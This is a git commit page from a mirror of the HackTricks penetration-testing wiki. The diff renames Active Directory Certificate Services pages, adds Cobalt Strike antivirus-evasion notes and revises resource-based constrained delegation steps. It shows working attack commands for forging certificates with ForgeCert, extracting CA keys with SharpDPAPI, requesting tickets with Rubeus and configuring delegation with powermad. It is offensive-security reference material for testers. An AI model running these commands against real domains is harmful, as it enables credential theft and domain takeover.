0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3450] No subject

This commit is contained in:
CPol 2022-09-03 00:18:00 +00:00 committed by gitbook-bot
parent dc2b1c14cb
commit 0437a86fff
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
9 changed files with 90 additions and 98 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
SUMMARY.md
View File

@ -157,10 +157,10 @@
* [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
* [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse.md)
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
* [Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
* [Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
* [Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md)
* [Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md)
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-account-persistence.md)
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-escalation.md)
* [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-persistence.md)
* [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/ad-cs-certificate-theft.md)
* [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
* [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
* [BloodHound](windows-hardening/active-directory-methodology/bloodhound.md)
@ -172,7 +172,6 @@
* [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
* [External Forest Domain - OneWay (Inbound)](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
* [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md)
* [Forged Certificates](windows-hardening/active-directory-methodology/forged-certificates.md)
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
* [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md)
* [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)

28
c2/cobalt-strike.md
View File

@ -201,3 +201,31 @@ Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templat
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
```bash
cd C:\Tools\neo4j\bin
neo4j.bat console
http://localhost:7474/ --> Change password
execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d cyberbotic.io
# Change powershell
C:\Tools\cobaltstrike\ResourceKit
template.x64.ps1
# Change $var_code -> $polop
# $x --> $ar
cobalt strike --> script manager --> Load --> Cargar C:\Tools\cobaltstrike\ResourceKit\resources.cna
#artifact kit
cd C:\Tools\cobaltstrike\ArtifactKit
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```

40
windows-hardening/active-directory-methodology/README.md
View File

@ -239,6 +239,14 @@ Then, if you **compromise the hash** of this user/computer you will be able to *
[constrained-delegation.md](constrained-delegation.md)
{% endcontent-ref %}
### Resourced-based Constrain Delegation
It's possible to gain code execution with **elevated privileges on a remote computer if you have WRITE privilege** on that computer's AD object.
{% content-ref url="resource-based-constrained-delegation.md" %}
[resource-based-constrained-delegation.md](resource-based-constrained-delegation.md)
{% endcontent-ref %}
### ACLs Abuse
The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.
@ -269,6 +277,22 @@ Usually users will access the system via RDP, so here you have how to performa c
[laps.md](laps.md)
{% endcontent-ref %}
### Certificate Theft
Gathering certificates from the compromised machine could be a way to escalate privileges inside the environment:
{% content-ref url="ad-certificates/ad-cs-certificate-theft.md" %}
[ad-cs-certificate-theft.md](ad-certificates/ad-cs-certificate-theft.md)
{% endcontent-ref %}
### Certificate Templates Abuse
If vulnerable templates are configured it's possible to abuse them to escalate privileges:
{% content-ref url="ad-certificates/ad-cs-domain-escalation.md" %}
[ad-cs-domain-escalation.md](ad-certificates/ad-cs-domain-escalation.md)
{% endcontent-ref %}
## Post-exploitation with high privilege account
### Dumping Domain Credentials
@ -324,10 +348,20 @@ These are like golden tickets forged in a way that **bypasses common golden tick
[diamond-ticket.md](diamond-ticket.md)
{% endcontent-ref %}
### **Forged Certificates**
### **Certificates Account Persistence**
{% content-ref url="forged-certificates.md" %}
[forged-certificates.md](forged-certificates.md)
**Having certificates of an account or being able to request them** is a very good way to be able to persist in the users account (even if he changes the password):
{% content-ref url="ad-certificates/ad-cs-account-persistence.md" %}
[ad-cs-account-persistence.md](ad-certificates/ad-cs-account-persistence.md)
{% endcontent-ref %}
### **Certificates Domain Persistence**
**Using certificates is also possible to persist with high privileges inside the domain:**
{% content-ref url="ad-certificates/ad-cs-domain-persistence.md" %}
[ad-cs-domain-persistence.md](ad-certificates/ad-cs-domain-persistence.md)
{% endcontent-ref %}
### AdminSDHolder Group

6
windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md → windows-hardening/active-directory-methodology/ad-certificates/ad-cs-account-persistence.md
View File

@ -1,4 +1,4 @@
# Account Persistence
# AD CS Account Persistence
<details>
@ -49,7 +49,7 @@ Rubeus.exe asktgt /user:harmj0y /certificate:C:\Temp\cert.pfx /password:CertPass
```
{% hint style="warning" %}
Combined with the technique outlined in the [**THEFT5**](certificate-theft.md#ntlm-credential-theft-via-pkinit-theft5) section, an attacker can also persistently **obtain the accounts NTLM hash**, which the attacker could use to authenticate via **pass-the-hash** or **crack** to obtain the **plaintext** **password**. \
Combined with the technique outlined in the [**THEFT5**](ad-cs-certificate-theft.md#ntlm-credential-theft-via-pkinit-theft5) section, an attacker can also persistently **obtain the accounts NTLM hash**, which the attacker could use to authenticate via **pass-the-hash** or **crack** to obtain the **plaintext** **password**. \
This is an alternative method of **long-term credential theft** that does **not touch LSASS** and is possible from a **non-elevated context.**
{% endhint %}
@ -57,7 +57,7 @@ This is an alternative method of **long-term credential theft** that does **not
If a certificate template allowed for **Domain Computers** as enrolment principals, an attacker could **enrol a compromised systems machine account**. The default **`Machine`** template matches all those characteristics.
If an **attacker elevates privileges** on compromised system, the attacker can use the **SYSTEM** account to enrol in certificate templates that grant enrolment privileges to machine accounts (more information in [**THEFT3**](certificate-theft.md#machine-certificate-theft-via-dpapi-theft3)).
If an **attacker elevates privileges** on compromised system, the attacker can use the **SYSTEM** account to enrol in certificate templates that grant enrolment privileges to machine accounts (more information in [**THEFT3**](ad-cs-certificate-theft.md#machine-certificate-theft-via-dpapi-theft3)).
You can use [**Certify**](https://github.com/GhostPack/Certify) **** to **** gather a certificate for the machine account elevating automatically to SYSTEM with:

0
windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md → windows-hardening/active-directory-methodology/ad-certificates/ad-cs-certificate-theft.md
View File

8
windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md → windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-escalation.md
View File

@ -1,4 +1,4 @@
# Domain Escalation
# AD CS Domain Escalation
<details>
@ -263,7 +263,7 @@ The two main rights here are the **`ManageCA`** right and the **`ManageCertifica
#### Abuse
If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](ad-cs-domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
<figure><img src="../../../.gitbook/assets/image (1) (2) (1).png" alt=""><figcaption></figcaption></figure>
@ -390,8 +390,8 @@ Common **problems** with NTLM relay attacks are that the **NTLM sessions are usu
However, abusing a NTLM relay attack to obtain a certificate to the user solves this limitations, as the session will live as long as the certificate is valid and the certificate can be used to use services **enforcing NTLM signing**. To know how to use an stolen cert check:
{% content-ref url="account-persistence.md" %}
[account-persistence.md](account-persistence.md)
{% content-ref url="ad-cs-account-persistence.md" %}
[ad-cs-account-persistence.md](ad-cs-account-persistence.md)
{% endcontent-ref %}
Another limitation of NTLM relay attacks is that they **require a victim account to authenticate to an attacker-controlled machine**. An attacker could wait or could try to **force** it:

6
windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md → windows-hardening/active-directory-methodology/ad-certificates/ad-cs-domain-persistence.md
View File

@ -1,4 +1,4 @@
# Domain Persistence
# AD CS Domain Persistence
<details>
@ -26,7 +26,7 @@ How can you tell that a certificate is a CA certificate?
* There are **no EKUs**
The built-in GUI supported way to **extract this certificate private key** is with `certsrv.msc` on the CA server.\
However, this certificate **isn't different** from other certificates stored in the system, so for example check the [**THEFT2 technique**](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) to see how to **extract** them.
However, this certificate **isn't different** from other certificates stored in the system, so for example check the [**THEFT2 technique**](ad-cs-certificate-theft.md#user-certificate-theft-via-dpapi-theft2) to see how to **extract** them.
You can also get the cert and private key using [**certipy**](https://github.com/ly4k/Certipy):
@ -67,7 +67,7 @@ The specified certificate should **work with the previously detailed forgery met
## Malicious Misconfiguration - DPERSIST3
There is a myriad of opportunities for **persistence** via **security descriptor modifications of AD CS** components. Any scenario described in the “[Domain Escalation](domain-escalation.md)” section could be maliciously implemented by an attacker with elevated access, as well as addition of “control rights'' (i.e., WriteOwner/WriteDACL/etc.) to sensitive components. This includes:
There is a myriad of opportunities for **persistence** via **security descriptor modifications of AD CS** components. Any scenario described in the “[Domain Escalation](ad-cs-domain-escalation.md)” section could be maliciously implemented by an attacker with elevated access, as well as addition of “control rights'' (i.e., WriteOwner/WriteDACL/etc.) to sensitive components. This includes:
* **CA servers AD computer** object
* The **CA servers RPC/DCOM server**

64
windows-hardening/active-directory-methodology/forged-certificates.md
View File

@ -1,64 +0,0 @@
# Forged Certificates
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
## Forged Certificates
Gaining **local admin access to a CA** allows an attacker to extract the **CA private key**, which can be used to sign a forged certificate (think of this like the krbtgt hash being able to sign a forged TGT). The default validity period for a CA private key is 5 years, but this can obviously be set to any value during setup, sometimes as high as 10+ years.
Once on a CA, [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) can extract the private keys.
<pre class="language-bash"><code class="lang-bash">.\SharpDPAPI.exe certificates /machine
# If Issuer and subject are the distinguished name of the CA, thats the one
<strong># Save the output to a .pem file and convert it to a .pfx with openssl on Kali</strong></code></pre>
Then, save the output to a `.pem` file and convert it to a **`.pfx` with openssl** on Kali.
Build the forged certificate with [**ForgeCert**](https://github.com/GhostPack/ForgeCert)**:**
```bash
.\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "password" --Subject "CN=User" --SubjectAltName "Administrator@cyberbotic.io" --NewCertPath fake.pfx --NewCertPassword "password"
```
Even though you can specify any SubjectAltName, the user does need to be present in AD. In this example, the default Administrator account is used.\
Then we can simply **use Rubeus to request a legitimate TGT** with this forged certificate and use it to access the domain controller:
```bash
.\Rubeus.exe asktgt /user:Administrator /domain:cyberbotic.io /certificate:MIACAQ[...snip...]IEAAAA /password:password /nowrap
```
{% hint style="warning" %}
Note that you aren't limited to forging user certificates, we can do the same for machines. Combine this with the S4U2self trick to gain access to any machine or service in the domain.
{% endhint %}
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

27
windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
View File

@ -1,7 +1,5 @@
# Resource-based Constrained Delegation
## Resource-based Constrained Delegation
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -28,8 +26,8 @@ Another important difference from this Constrained Delegation to the other deleg
### New Concepts
Back in Constrained Delegation it was told that the _**TrustedToAuthForDelegation**_ flag inside the _userAccountControl_ value of the user is needed to perform a **S4U2Self.** But that's not completely truth.\
The reality is that even without that value, you can perform a **S4U2Self** against any user if you are a **service** (have a SPN) but, if you **have \_TrustedToAuthForDelegation** \_ the returned TGS will be **Forwardable** and if you **don't have** that flag the returned TGS **won't** be **Forwardable**.
Back in Constrained Delegation it was told that the **`TrustedToAuthForDelegation`** flag inside the _userAccountControl_ value of the user is needed to perform a **S4U2Self.** But that's not completely truth.\
The reality is that even without that value, you can perform a **S4U2Self** against any user if you are a **service** (have a SPN) but, if you **have `TrustedToAuthForDelegation`** the returned TGS will be **Forwardable** and if you **don't have** that flag the returned TGS **won't** be **Forwardable**.
However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to abuse a **basic Constrain Delegation** it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work** (this is not a vulnerability, it's a feature, apparently).
@ -40,12 +38,12 @@ However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to a
Suppose that the attacker has already **write equivalent privileges over the victim computer**.
1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
2. The attacker configures **resource-based constrained delegation from Service A to the victim host**.
2. The attacker **abuses its WRITE privilege** over the victim computer (ServiceB) to configure **resource-based constrained delegation to allow ServiceA to impersonate any user** against that victim computer (ServiceB).
3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**.
1. S4U2Self (from the SPN compromised/created account): Ask for a **TGS of Administrator to me** (Not Forwardable).
2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS** from **Administrator** to the **victim host**.
3. Even if you are using a not Forwardable TGS, as you are exploiting Resource-based constrained delegation, it will work.
4. The attacker can **pass-the-ticket** and **impersonate** the user to gain **access to the victim**.
4. The attacker can **pass-the-ticket** and **impersonate** the user to gain **access to the victim ServiceB**.
To check the _**MachineAccountQuota**_ of the domain you can use:
@ -61,13 +59,13 @@ You can create a computer object inside the domain using [powermad](https://gith
```csharp
import-module powermad
New-MachineAccount -MachineAccount FAKECOMPUTER -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
```
![](../../.gitbook/assets/b1.png)
```bash
Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview
Get-DomainComputer SERVICEA #Check if created if you have powerview
```
### Configuring R**esource-based Constrained Delegation**
@ -75,7 +73,7 @@ Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview
**Using activedirectory PowerShell module**
```bash
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$ #Assing delegation privileges
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount SERVICEA$ #Assing delegation privileges
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
```
@ -152,13 +150,10 @@ Lear about the [**available service tickets here**](silver-ticket.md#available-s
## References
{% embed url="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html" %}
{% embed url="https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/" %}
{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object" %}
{% embed url="https://blog.stealthbits.com/resource-based-constrained-delegation-abuse/" %}
* [https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
* [https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/](https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/)
* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object)
* [https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
<details>